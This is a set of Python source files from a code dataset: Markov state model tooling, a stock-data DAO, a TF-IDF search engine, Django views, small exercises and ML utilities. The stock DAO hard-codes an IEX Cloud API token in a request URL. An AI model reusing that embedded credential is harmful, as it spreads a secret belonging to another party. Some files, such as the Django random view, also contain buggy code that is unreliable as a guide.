specified folders\n dtrajs = getDtrajs(folder, stateDict, refineList, longT=longT, shortT=shortT,\n otherT=otherT)\n\n #set the minimum observation thresholds based on the trajectory types\n min_count = 1\n min_frame = 2\n if (otherT):\n min_count = 2\n min_frame = 4\n\n #construct the MSM object\n M = MSM(dtrajs, lag, Eh, Ep, num_states, min_count=min_count, min_frame=min_frame)\n\n #return MSM object\n return M\n\ndef batch_make_MSM(lag, data_version = '', refine = False):\n #make an MSM for every input in the parameter map file\n\n #get the parameter values as a function of input number\n H, P, traj_types = getParameterMap()\n\n #loop over the parameter to construct MSMs\n for i in range(35,len(H)):\n\n #get parameter values\n h = H[i]\n p = P[i]\n type_string = traj_types[i]\n\n #parse the type_string into meaningful values\n if (\"N\" in type_string): \n\n #this parameter set is null. 
Skip MSM creation\n continue\n\n else:\n\n #get booleans for each sim type\n longT, shortT, otherT = getTrajType(type_string)\n\n\n #set folder path\n folder = \"../trajectories/P{}H{}/\".format(p,h)\n\n #check that the folder exists, continue to next set if not\n if (not os.path.exists(folder)):\n continue\n\n #create the MSM\n print(\"Creating MSM {} using parameters P{}H{}\".format(i,p,h))\n M = createMSM(folder, lag, data_version=data_version, refine=refine,\n longT=longT, shortT=shortT, otherT=otherT)\n\n #pickle the MSM according to its index number and the run type\n out_file = \"msm\" + data_version + \"/msm\"\n if (refine):\n out_file += \"R\"\n out_file += \"{}\".format(i)\n with open(out_file, 'wb') as f:\n pickle.dump(M, f)\n\n return\n\n\n\nif __name__ == \"__main__\":\n\n #create one MSM\n folder = \"../trajectories/P1.4H1.45/\"\n lag = 125\n # initial_state = (12,29,60,57,27)\n # initial_state = (12,30,60,60,26)\n # initial_state = (12,31,29)\n # initial_state = (12,30,30)\n # initial_state = (12,31,27)\n initial_state = (0,0,0)\n # initial_state = (10,20,12)\n\n # target_state = (12,30,30)\n target_state = (12,29,60,57,27)\n # target_state = (12,30,60,60,26)\n # target_state = (12,30,26)\n # target_state = (12,31,29)\n # target_state=initial_state\n\n #createMSM(folder,lag,\"V1\",False)\n\n #do testing on MSM - compare dynamics curves or assess convergence\n\n # MSMtestingScratch(folder, lag, data_version='',refine=True,\n # longT=True, shortT=True, otherT=True, \n # initial_state=initial_state,target_state=target_state)\n\n # MSMtestingLoad(\"msm_tests/msmP1.25H1.4\", data_version='', refine=True,\n # initial_state=initial_state, target_state=target_state)\n\n #27 and 6 are adjacent\n # MSMtestingLoad(\"msm/msmR7\", data_version='', refine=True,\n # initial_state=initial_state, target_state=target_state)\n\n #convergenceSamples(folder+\"state12_29_27/\")\n convergenceLag(folder, initial_state, target_state, refine=True)\n\n #refine the state space discretization by comparing disassembly trajs in folder\n # getStatesToRefine(folder)\n\n #batch make MSMs without any extraneous output\n # batch_make_MSM(lag, refine=True)\n\n\n #make a refine list manually\n # stateDict, refineList = loadStateDict()\n # num_states = len(stateDict)\n # inv_map = {v: k for k, v in stateDict.items()}\n\n # refineList = [inv_map[i] for i in range(num_states)]\n # print(refineList)\n\n # set_name = \"data/refineStates\"\n # with open(set_name, 'wb') as f:\n # pickle.dump(refineList, f)\n # print(\"Wrote set of candidate states to {}\".format(set_name))\n\n","repo_name":"onehalfatsquared/protocolOptMSM","sub_path":"MSM/manualMSM.py","file_name":"manualMSM.py","file_ext":"py","file_size_in_byte":54917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"44045581177","text":"from ..Model.models import Company\r\nimport requests\r\n\r\n\r\n#search stock's profile\r\ndef insert_company(symbol):\r\n detail = requests.get(\r\n 'https://cloud.iexapis.com/v1/stock/%s/company?token=pk_31fcf86b343d49269bb965ad718fbec6' % symbol)\r\n detail = detail.json()\r\n companyName = detail['companyName']\r\n industry = detail['industry']\r\n website = detail['website']\r\n CEO = detail['CEO']\r\n sector = detail['sector']\r\n country = detail['country']\r\n company = Company()\r\n company.symbol = symbol\r\n company.company = companyName\r\n company.industry = industry\r\n company.website = website\r\n company.CEO = CEO\r\n company.sector = sector\r\n 
company.country = country\r\n company.save()\r\n\r\n\r\n\r\ndef find_company(symbol):\r\n result = Company.objects.get(symbol=symbol)\r\n content = {'symbol', result.symbol,\r\n 'company', result.company,\r\n 'industry', result.industry,\r\n 'website', result.website,\r\n 'CEO', result.CEO,\r\n 'sector', result.sector,\r\n 'country', result.country}\r\n return content","repo_name":"Liang-Rui/Stock-Portfolio-Management-System","sub_path":"backend/src/stock/DAO/ComanyDAO.py","file_name":"ComanyDAO.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"99"} +{"seq_id":"1563223555","text":"# -*- coding: utf-8 -*-\nimport shelve\nimport nltk\nimport json\nfrom nltk.tokenize import RegexpTokenizer\nfrom nltk.corpus import stopwords\nfrom nltk.stem import PorterStemmer\nimport time\nimport math\nimport heapq\n\n# stopwords list from nltk\nstemmer = PorterStemmer()\ntokenizer = RegexpTokenizer(r'\\w+')\n\ndata_path = 'test_corpus.json'\n\n\n############ Building Posting List ####################\n# load_data\ndef loadJson(data_path):\n database = shelve.open('database', writeback=False)\n film_data = open(data_path).read()\n data = json.loads(film_data)\n database['corpus'] = data\n database.close()\n return data\n\n\n# indexAll\ndef indexAllData(data):\n database = shelve.open('database', writeback=False)\n posting_list = {}\n for i in range(0, len(data)) :\n\n words_list = tokenize_stemming(data[str(i)]['text'])\n for word in words_list :\n\n if word not in posting_list:\n posting_list[word] = {}\n if i not in posting_list[word]:\n posting_list[word][i] = 0\n\n posting_list[word][i] = posting_list[word][i] + 1\n if i % 500 == 0:\n print('index finish ' + str(i))\n # posting_list[word].append(i)\n if i > 2049:\n print(i)\n print(\"posting list finished\")\n database['posting_list'] = posting_list\n database.close()\n print(\"store posting list finished\")\n calculate_doc_length()\n return\n\n\ndef get_tf_doc(term, docId):\n\n posting_list = shelve.open('database', writeback=False)['posting_list']\n\n return 1 + math.log(posting_list[term][docId], 10)\n\n# caculate term frequency for a term in search query\ndef get_tf_query(term, query):\n\n raw_tf = 0\n\n for word in query:\n if word == term:\n raw_tf = raw_tf + 1\n\n return 1 + math.log(raw_tf, 10)\n\n# get idf for a term\ndef get_idf(term):\n database = shelve.open('database', writeback=False)\n posting_list = database['posting_list']\n data = database['corpus']\n\n df = len(posting_list[term])\n N = len(data)\n\n res = math.log(float(N)/ float(df), 10)\n return res\n\n\n# return doc_length for a docId\ndef get_doc_length(docId):\n database = shelve.open('database', writeback=False)\n doc_lenth = database['doc_length']\n return doc_lenth[docId]\n\n# calculate weight lenth of all document\ndef calculate_doc_length():\n database = shelve.open('database', writeback=False)\n print('calculate length begin')\n doc_length = {}\n data = database['corpus']\n\n for i in range(0, len(data)) :\n words_list = tokenize_stemming(data[str(i)]['text'])\n doc_len = 0\n for word in set(words_list) :\n tf = get_tf_doc(word, i)\n idf = get_idf(word)\n score = tf * idf\n doc_len = doc_len + score * score\n\n doc_length[i] = math.sqrt(doc_len)\n if i % 500 == 0:\n print('calculate doc_length finish ' + str(i))\n\n database['doc_length'] = doc_length\n return\n\n\n# get cosin score for a query, docId pair\ndef cosin_score(query, docId):\n\n score = 0.0\n\n for term in set(query):\n\n 
score = score + get_tf_doc(term, docId) * get_idf(term) * get_tf_query(term, query) * get_idf(term) / get_doc_length(docId)\n\n return score\n\n# rank all result based on cosi score\ndef rank_result(query, movieId):\n\n score = {}\n ranked = []\n res_scores = []\n res_movieId = []\n for i in movieId:\n score[i] = cosin_score(query, i)\n heapq.heappush(ranked, (score[i], i))\n\n res = heapq.nlargest(len(movieId), ranked)\n\n for i in range(0, len(res)):\n res_movieId.append(res[i][1])\n res_scores.append(res[i][0])\n\n return res_movieId, res_scores\n\n# tokenize() to generate all possible words\n\n\ndef tokenize_stemming(raw_text):\n\n words = tokenizer.tokenize(raw_text)\n stem_word = []\n for word in words :\n stem_word.append(stemmer.stem(word))\n return set(stem_word)\n\n\ndef storeStopWords():\n database = shelve.open('database', writeback=False)\n database['stopWords'] = set(stopwords.words('english'))\n database.close()\n\n\n################## Process Input query And Search #########################\n\nclass SearchEngine:\n\n def search(self, query) :\n pre_result = self.preprocess(query)\n pre_result['movie_ids'] = []\n if pre_result['unKnown']:\n return pre_result\n new_query = pre_result['realQuery']\n pre_result['movie_ids'], pre_result['scores'] = self.findMovieId(new_query)\n\n return pre_result\n\n\n def preprocess(self, query):\n database = shelve.open('database', writeback=False)\n res = {}\n res['stopWords'] = []\n res['unKnown'] = []\n res['realQuery'] = []\n posting_list = database['posting_list']\n stopWords = database['stopWords']\n\n words = tokenizer.tokenize(query)\n for word in words:\n if word in stopWords:\n res['stopWords'].append(word.encode('ascii', 'ignore'))\n else :\n wd = stemmer.stem(word).encode('ascii', 'ignore')\n if wd not in posting_list:\n res['unKnown'].append(wd)\n else :\n res['realQuery'].append(wd)\n database.close()\n return res\n\n\n def findMovieId(self, query):\n database = shelve.open('database', writeback=False)\n movieId = []\n if len(query) == 0 :\n return movieId, []\n\n posting_list = database['posting_list']\n new_query = sorted(query, key = lambda word : len(posting_list[word]))\n movieId = sorted(posting_list[new_query[0]].keys())\n if len(query) == 1 :\n movieId, rank_score = rank_result(query, movieId)\n return movieId, rank_score\n print(len(movieId))\n for word in new_query[1:]:\n movieId = self.intersect(movieId, sorted(posting_list[word].keys()))\n\n movieId, rank_score = rank_result(query, movieId)\n\n return movieId, rank_score\n\n def intersect(self, idList1, idList2):\n print(len(idList2))\n i = 0\n j = 0\n res = []\n while (i < len(idList1) and j < len(idList2)) :\n if idList1[i] < idList2[j]:\n i = i + 1\n elif idList1[i] > idList2[j]:\n j = j + 1\n else:\n res.append(idList1[i])\n i = i + 1\n j = j + 1\n return res\n\n\n def get_movie_data(self, doc_id):\n database = shelve.open('database', writeback=False)\n corpus = database['corpus']\n\n return corpus[doc_id]\n\n\n def get_movie_snippet(self, doc_id):\n\n database = shelve.open('database', writeback=False)\n data = database['corpus']\n\n try:\n title = data[str(doc_id)]['title']\n except:\n title = ''\n\n try:\n text = data[str(doc_id)]['text']\n except:\n text = ''\n\n return (doc_id, title, text)\n\n\nif __name__ == '__main__':\n\n start_time = time.clock()\n print('Build Start!')\n data = loadJson(data_path)\n indexAllData(data)\n storeStopWords()\n end_time = time.clock()\n print('Build End!')\n print('Build Time Use ' + str(end_time - start_time) + ' 
seconds')\n\n\n\n\n","repo_name":"yuchengtang94/ir_hw4","sub_path":"vs_index.py","file_name":"vs_index.py","file_ext":"py","file_size_in_byte":7276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"4503097586","text":"from django.shortcuts import render, redirect\nfrom .models import Question, Comment\nfrom .forms import QuestionForm, CommentForm\n\n# Create your views here.\n\ndef index(request):\n questions = Question.objects.all()\n context = {'questions': questions,}\n\n return render(request, 'eithers/index.html', context)\n\n\ndef create(request):\n if request.method == 'POST':\n form = QuestionForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('eithers:index')\n \n # GET 일 때 create.html 을 사용자에게 보여줌\n form = QuestionForm()\n context = {\n 'form': form,\n }\n return render(request, 'eithers/create.html', context)\n\n\ndef detail(request, question_pk):\n question = Question.objects.get(pk=question_pk)\n # 역참조\n comments = question.comments.all()\n comment_form = CommentForm()\n context = {\n 'question': question,\n 'comment_form': comment_form,\n 'comments': comments,\n }\n return render(request, 'eithers/detail.html', context)\n\n# 댓글 생성\ndef comment(request, question_pk):\n question = Question.objects.get(pk=question_pk)\n \n form = CommentForm(request.POST)\n if form.is_valid():\n # 사용자가 직접 question을 입력하지 않으므로\n # views.py 에서 지정해준 후 저장\n comment = form.save(commit=False)\n comment.question = question\n comment.save()\n \n return redirect('eithers:detail', question_pk)\n\ndef random(request):\n # 있는가 없는가\n count = Question.objects.count()\n # 에외처리 먼저\n if count <= 0:\n return redirect('eithers:index')\n \n # 첫번 째 방법 - 가장 쉬운 방법\n question = ra.choice(Question.objects.all())\n return redurect('eithers:detail', question.id)\n\n # 구글링\n # question = Question.objects.order_by('?').first()\n # return redirect('eithers:detail', question.id)\n \n # 데이터가 적을 떄 일반적으로 사용하는 방법\n # max_id 기준으로 randint 사용하기\n max_id = Question.objects.all().aggregate(max_id=Mac('id'))['max_id']\n question_pk = ra.randint(1, max_id)\n if Question.objects.filter(pk=question_pk).exists():\n return redirect('eithers:detail', question_pk)\n \n return redirect('eithers:detail', question.id)","repo_name":"sangmihwang/TIL","sub_path":"lecture/db/230410/config/eithers/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"4250304879","text":"def GCD(a,b):\n while a%b != 0:\n r = a%b\n a = b\n b = r\n return b\nnumbers = []\nwith open('./Dane_PR2/liczby.txt', 'r') as fileInput:\n for line in fileInput.readlines():\n numbers.append(int(line.rstrip()))\n\nN = len(numbers) \ndividerMax = 0\nfirstNumMax = 0\nlengthMax = 0\n\nfor j in range(N-1):\n length = 1\n firstNum = numbers[j]\n localGCD = numbers[j]\n for i in range(j+1, N):\n n = GCD(localGCD, numbers[i])\n if n > 1:\n localGCD = n\n length += 1\n if n==1 or i == N-1:\n if lengthMax < length:\n dividerMax = localGCD\n lengthMax = length\n firstNumMax = firstNum\n break\nprint(firstNumMax, lengthMax, dividerMax)\nwith open('wyniki4.txt', 'a', encoding='utf-8') as fileOutput:\n fileOutput.write('4.3: \\n')\n fileOutput.write(f'Pierwsza liczba: {firstNumMax} \\n')\n fileOutput.write(f'Długość ciągu: {lengthMax} \\n')\n fileOutput.write(f'Dzielnik: {dividerMax} 
\\n')\n","repo_name":"Kosaaaaa/matura-informatyka-2019","sub_path":"zad43.py","file_name":"zad43.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"1456266396","text":"#!/usr/bin/python3.6 \n# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom pathlib import Path\nimport datetime\nimport shutil\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport logging\nimport coloredlogs\nimport os\nimport cv2\nimport torch\nimport functools\nimport numpy as np\nimport math\nfrom torchvision.utils import make_grid\nimport matplotlib.pyplot as plt\nimport random\nfrom decimal import Decimal\n\nfrom option import args\nfrom model.quant_ops import quant_act_pams\n\nfrom model.edge import BitSelector\nfrom model.cadyq import BitSelector as BitSelector_org\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nclass AverageMeter(object):\n def __init__(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n if self.count > 0:\n self.avg = self.sum / self.count\n\n def accumulate(self, val, n=1):\n self.sum += val\n self.count += n\n if self.count > 0:\n self.avg = self.sum / self.count\n\nclass Logger(object):\n def __init__(self, fpath, title=None, resume=False):\n self.file = None\n self.resume = resume\n self.title = '' if title == None else title\n if fpath is not None:\n if resume:\n self.file = open(fpath, 'r')\n name = self.file.readline()\n self.names = name.rstrip().split('\\t')\n self.numbers = {}\n for _, name in enumerate(self.names):\n self.numbers[name] = []\n\n for numbers in self.file:\n numbers = numbers.rstrip().split('\\t')\n for i in range(0, len(numbers)):\n self.numbers[self.names[i]].append(numbers[i])\n self.file.close()\n self.file = open(fpath, 'a')\n else:\n self.file = open(fpath, 'w')\n\n def set_names(self, names):\n if self.resume:\n pass\n # initialize numbers as empty list\n self.numbers = {}\n self.names = names\n for _, name in enumerate(self.names):\n self.file.write(name)\n self.file.write('\\t')\n self.numbers[name] = []\n self.file.write('\\n')\n self.file.flush()\n\n def append(self, numbers):\n assert len(self.names) == len(numbers), 'Numbers do not match names'\n for index, num in enumerate(numbers):\n self.file.write(\"{0:.6f}\".format(num))\n self.file.write('\\t')\n self.numbers[self.names[index]].append(num)\n self.file.write('\\n')\n self.file.flush()\n\n def plot(self, names=None):\n names = self.names if names == None else names\n numbers = self.numbers\n for _, name in enumerate(names):\n x = np.arange(len(numbers[name]))\n plt.plot(x, np.asarray(numbers[name]))\n plt.legend([self.title + '(' + name + ')' for name in names])\n plt.grid(True)\n\n def close(self):\n if self.file is not None:\n self.file.close()\n\n\ndef accuracy(output, target, topk=(1,)):\n maxk = max(topk)\n batch_size = target.size(0)\n\n _, pred = output.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(0)\n res.append(correct_k.mul_(100.0 / batch_size))\n return res\n\nUSE_CUDA = torch.cuda.is_available()\nFLOAT = torch.cuda.FloatTensor if USE_CUDA else torch.FloatTensor\nfrom torch.autograd import Variable\n\n\ndef 
to_numpy(var):\n # return var.cpu().data.numpy()\n return var.cpu().data.numpy() if USE_CUDA else var.data.numpy()\n\n\ndef to_tensor(ndarray, volatile=False, requires_grad=False, dtype=FLOAT):\n return Variable(\n torch.from_numpy(ndarray), volatile=volatile, requires_grad=requires_grad\n ).type(dtype)\n\n\ndef sample_from_truncated_normal_distribution(lower, upper, mu, sigma, size=1):\n from scipy import stats\n return stats.truncnorm.rvs((lower-mu)/sigma, (upper-mu)/sigma, loc=mu, scale=sigma, size=size)\n\n\n# logging\ndef prRed(prt): print(\"\\033[91m {}\\033[00m\" .format(prt))\ndef prGreen(prt): print(\"\\033[92m {}\\033[00m\" .format(prt))\ndef prYellow(prt): print(\"\\033[93m {}\\033[00m\" .format(prt))\ndef prLightPurple(prt): print(\"\\033[94m {}\\033[00m\" .format(prt))\ndef prPurple(prt): print(\"\\033[95m {}\\033[00m\" .format(prt))\ndef prCyan(prt): print(\"\\033[96m {}\\033[00m\" .format(prt))\ndef prLightGray(prt): print(\"\\033[97m {}\\033[00m\" .format(prt))\ndef prBlack(prt): print(\"\\033[98m {}\\033[00m\" .format(prt))\n\n\ndef cross_entropy_with_label_smoothing(pred, target, label_smoothing=0.1):\n logsoftmax = nn.LogSoftmax()\n n_classes = pred.size(1)\n # convert to one-hot\n target = torch.unsqueeze(target, 1)\n soft_target = torch.zeros_like(pred)\n soft_target.scatter_(1, target, 1)\n # label smoothing\n soft_target = soft_target * (1 - label_smoothing) + label_smoothing / n_classes\n return torch.mean(torch.sum(- soft_target * logsoftmax(pred), 1))\n \n\ndef wrapped_partial(func, *args, **kwargs):\n partial_func = functools.partial(func, *args, **kwargs)\n functools.update_wrapper(partial_func, func)\n return partial_func\n\n\ndef get_logger(file_path, name='ED'):\n \"\"\" Make python logger \"\"\"\n # [!] Since tensorboardX use default logger (e.g. logging.info()), we should use custom logger\n logger = logging.getLogger(name)\n coloredlogs.install(level='INFO', logger=logger)\n\n log_format = '%(asctime)s | %(message)s'\n formatter = logging.Formatter(log_format, datefmt='%m/%d %I:%M:%S %p')\n file_handler = logging.FileHandler(file_path)\n file_handler.setFormatter(formatter)\n\n logger.addHandler(file_handler)\n\n return logger\n\ndef print_params(config, prtf=print):\n prtf(\"\")\n prtf(\"Parameters:\")\n for attr, value in sorted(config.items()):\n prtf(\"{}={}\".format(attr.upper(), value))\n prtf(\"\")\n\n\ndef as_markdown(config):\n \"\"\" Return configs as markdown format \"\"\"\n text = \"|name|value| \\n|-|-| \\n\"\n for attr, value in sorted(config.items()):\n text += \"|{}|{}| \\n\".format(attr, value)\n\n return text\n\ndef at(x):\n return F.normalize(x.pow(2).mean(1).view(x.size(0), -1))\n\ndef at_loss(x, y):\n return (at(x) - at(y)).pow(2).mean()\n\n# def distillation(criterion,outputs, labels, teacher_outputs, params):\n# \"\"\"\n# Compute the knowledge-distillation (KD) loss given outputs, labels.\n# \"Hyperparameters\": temperature and alpha\n# NOTE: the KL Divergence for PyTorch comparing the softmaxs of teacher\n# and student expects the input tensor to be log probabilities! See Issue #2\n# \"\"\"\n# alpha = params.alpha\n# T = params.temperature\n# KD_loss = nn.KLDivLoss(reduction='mean')(torch.nn.functional.log_softmax(outputs/T, dim=1),\n# torch.nn.functional.softmax(teacher_outputs/T, dim=1)) * (alpha * T * T) +\\\n# criterion(outputs, labels) * (1. 
- alpha)\n# return KD_loss\n\ndef distillation(y, teacher_scores, labels, T, alpha):\n p = F.log_softmax(y/T, dim=1)\n q = F.softmax(teacher_scores/T, dim=1)\n l_kl = F.kl_div(p, q, reduction='sum') * (T**2) / y.shape[0]\n l_ce = F.cross_entropy(y, labels)\n return l_kl * alpha + l_ce * (1. - alpha)\n\n\ndef pix_loss(x,y):\n loss = torch.mean(torch.mean(torch.abs(x-y), dim = (1,2,3)))\n return loss\n \n####################\n# image convert\n####################\n\ndef _make_dir(path):\n if not os.path.exists(path): os.makedirs(path)\n\ndef tensor2img(tensor, out_type=np.uint8, min_max=(0, 1)):\n '''\n Converts a torch Tensor into an image Numpy array\n Input: 4D(B,(3/1),H,W), 3D(C,H,W), or 2D(H,W), any range, RGB channel order\n Output: 3D(H,W,C) or 2D(H,W), [0,255], np.uint8 (default)\n '''\n tensor = tensor.squeeze().float().cpu().clamp_(*min_max) # clamp\n tensor = (tensor - min_max[0]) / (min_max[1] - min_max[0]) # to range [0,1]\n n_dim = tensor.dim()\n if n_dim == 4:\n n_img = len(tensor)\n img_np = make_grid(tensor, nrow=int(math.sqrt(n_img)), normalize=False).numpy()\n img_np = np.transpose(img_np[[2, 1, 0], :, :], (1, 2, 0)) # HWC, BGR\n elif n_dim == 3:\n img_np = tensor.numpy()\n img_np = np.transpose(img_np[[2, 1, 0], :, :], (1, 2, 0)) # HWC, BGR\n elif n_dim == 2:\n img_np = tensor.numpy()\n else:\n raise TypeError(\n 'Only support 4D, 3D and 2D tensor. But received with dimension: {:d}'.format(n_dim))\n if out_type == np.uint8:\n img_np = (img_np * 255.0).round()\n # Important. Unlike matlab, numpy.unit8() WILL NOT round by default.\n return img_np.astype(out_type)\n\n\ndef save_img(img, img_path, mode='RGB'):\n cv2.imwrite(img_path, img)\n\n\ndef get_activation(name,activation):\n def hook(model, input, output):\n activation[name] = output\n return hook\n\ndef plot_loss(args,loss,apath,epoch):\n axis = np.linspace(1, epoch, epoch)\n for i, l in enumerate(loss):\n label = '{} Loss'.format(l['type'])\n fig = plt.figure()\n plt.title(label)\n plt.plot(axis, log[:, i].numpy(), label=label)\n plt.legend()\n plt.xlabel('Epochs')\n plt.ylabel('Loss')\n plt.grid(True)\n plt.savefig(os.path.join(apath, 'loss_{}.pdf'.format(l['type'])))\n plt.close(fig)\n\ndef plot_psnr(args,apath,epoch,log):\n \n axis = np.linspace(1, epoch, epoch)\n for idx_data, d in enumerate(args.data_test):\n label = 'SR on {}'.format(d)\n fig = plt.figure()\n plt.title(label)\n for idx_scale, scale in enumerate(args.scale):\n plt.plot(\n axis,\n log[:, idx_data, idx_scale].numpy(),\n label='Scale {}'.format(scale)\n )\n plt.legend()\n plt.xlabel('Epochs')\n plt.ylabel('PSNR')\n plt.grid(True)\n plt.savefig(os.path.join(apath, 'test_{}_{}.png'.format(d, args.save)))\n plt.close(fig)\n\ndef plot_bit(args,apath,epoch,log):\n \n axis = np.linspace(1, epoch, epoch)\n for idx_data, d in enumerate(args.data_test):\n label = 'SR on {}'.format(d)\n fig = plt.figure()\n plt.title(label)\n for idx_scale, scale in enumerate(args.scale):\n plt.plot(\n axis,\n log[:, idx_data, idx_scale].numpy(),\n label='Scale {}'.format(scale)\n )\n plt.legend()\n plt.xlabel('Epochs')\n plt.ylabel('Avg Bit')\n plt.grid(True)\n plt.savefig(os.path.join(apath, 'test_{}_bit_{}.png'.format(d, args.save)))\n plt.close(fig)\n\ndef save_checkpoint(state, is_best, checkpoint='checkpoint', filename='checkpoint.pth.tar', lpips=False):\n filepath = os.path.join(checkpoint, filename)\n torch.save(state, filepath)\n if is_best:\n if lpips:\n shutil.copyfile(filepath, os.path.join(checkpoint, 'model_best_lpips.pth.tar'))\n else:\n 
shutil.copyfile(filepath, os.path.join(checkpoint, 'model_best.pth.tar'))\n else:\n shutil.copyfile(filepath, os.path.join(checkpoint, 'model_latest.pth.tar'))\n\n\ndef laplacian(image):\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n laplac = cv2.Laplacian(gray, cv2.CV_16S, ksize=3)\n mask_img = cv2.convertScaleAbs(laplac)\n return mask_img\n\ndef tensor2img(tensor, out_type=np.uint8, min_max=(0, 1)):\n '''\n Converts a torch Tensor into an image Numpy array\n Input: 4D(B,(3/1),H,W), 3D(C,H,W), or 2D(H,W), any range, RGB channel order\n Output: 3D(H,W,C) or 2D(H,W), [0,255], np.uint8 (default)\n '''\n tensor = tensor.squeeze().float().cpu().clamp_(*min_max) # clamp\n tensor = (tensor - min_max[0]) / (min_max[1] - min_max[0]) # to range [0,1]\n n_dim = tensor.dim()\n if n_dim == 4:\n n_img = len(tensor)\n img_np = make_grid(tensor, nrow=int(math.sqrt(n_img)), normalize=False).numpy()\n img_np = np.transpose(img_np[[2, 1, 0], :, :], (1, 2, 0)) # HWC, BGR\n elif n_dim == 3:\n img_np = tensor.numpy()\n img_np = np.transpose(img_np[[2, 1, 0], :, :], (1, 2, 0)) # HWC, BGR\n elif n_dim == 2:\n img_np = tensor.numpy()\n else:\n raise TypeError('Only support 4D, 3D and 2D tensor. But received with dimension: {:d}'.format(n_dim))\n if out_type == np.uint8:\n img_np = (img_np * 255.0).round()\n # Important. Unlike matlab, numpy.unit8() WILL NOT round by default.\n return img_np.astype(out_type)\n\n\n\ndef set_bit_config(model, bit_config):\n for n, m in model.named_modules():\n if isinstance(m, quant_act_pams):\n plist = n.split('.')\n block_index = int(plist[1])\n quant_index = int(plist[2][-1])\n # print(f'bindex:{block_index} qindex:{quant_index}')\n if quant_index != 3:\n setattr(m, 'k_bits', bit_config[block_index*2 + quant_index - 1])\n\ndef set_bit_flag(model, flag):\n # flag -> batch_size bit_width\n total_index = 0\n for n, m in model.named_modules():\n if isinstance(m, BitSelector):\n cur_list = []\n for i in range(len(flag)):\n cur_list.append(flag[i][total_index])\n setattr(m, 'flag', torch.tensor(cur_list, dtype=torch.int32))\n total_index += 1\n \ndef get_bit_config(model):\n bit_list = []\n flag=0\n for n, m in model.named_modules():\n flag=0\n if isinstance(m, BitSelector_org):\n if int(getattr(m, 'bits_out')) == args.search_space[2]:\n flag = 2\n elif int(getattr(m, 'bits_out')) == args.search_space[1]:\n flag = 1\n else:\n flag = 0 \n bit_list.append(flag)\n return bit_list\n\n\ndef random_pick(some_list, probabilities): \n x = random.uniform(0,1) \n cumulative_probability = 0.0 \n for item, item_probability in zip(some_list, probabilities): \n cumulative_probability += item_probability \n if x < cumulative_probability:\n break \n return item\n","repo_name":"Sheldon04/CABM-pytorch","sub_path":"utils/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":14357,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"99"} +{"seq_id":"43521908088","text":"def main():\n tol = 1/1000\n res = multiply(tol)\n print(\"Produkt: {0}\\nIterasjoner: {1}\\nToleranse: {2}\".format(res[0],res[1],tol))\n \ndef multiply(tol):\n product = 1\n i = 1\n while(True):\n productold = product\n n = 1 + 1/i**2\n product *= n\n i+=1\n if((product - productold) < tol):\n break\n return product,i\nmain()","repo_name":"Hrkrabbe/Python","sub_path":"Øving 5/multiplikasjon.py","file_name":"multiplikasjon.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} 
+{"seq_id":"39227500631","text":"import sys\nimport math\n\n\ndef sqrt(number):\n \"\"\"\n Calculate the floored square root of a number\n This is a divide and conquer algorithm\n\n Args:\n number(int): Number to find the floored squared root\n Returns:\n int: Floored Square Root\n \"\"\"\n\n if number is None or not isinstance(number, int):\n return None\n\n # Square root of absolute values 1 and 0 are the same as the original values\n if abs(number) == 1 or abs(number) == 0:\n return number\n\n negligible_approximation = 0.01\n\n mid = number/2\n\n lower_bound = 0\n upper_bound = number\n\n while abs(mid**2 - number) >= negligible_approximation:\n\n # determine which bound our mid value is close to\n if mid**2 < number:\n lower_bound = mid\n else:\n upper_bound = mid\n\n # combine upper and lower bound and divide them by half to repeat the cycle\n mid = (lower_bound + upper_bound)/2\n\n # get the rounded value of the mid\n return math.floor(mid)\n","repo_name":"george-marcus/problems-vs-algorithms","sub_path":"Finding Square Root of an Integer/sqrt.py","file_name":"sqrt.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"28563358732","text":"# tempo2_utils.py\n\n# Simple python functions to help gather results from tempo2\n\nimport os\nimport numpy\nimport subprocess\nimport tempfile\n\n_nobs = 30000\n\ndef general2(parfile, timfile, params):\n \"\"\"\n general2(parfile, timfile, params):\n\n Calls tempo2 with the general2 plugin, and reads the output.\n\n Inputs:\n parfile = string, name of parfile\n timfile = string, name of tim file\n params = list of general2 values to return\n\n Outputs:\n dict of numpy arrays for each requested param.\n\n Notes:\n Assumes each parameter results in a single text column in the general2\n output. 
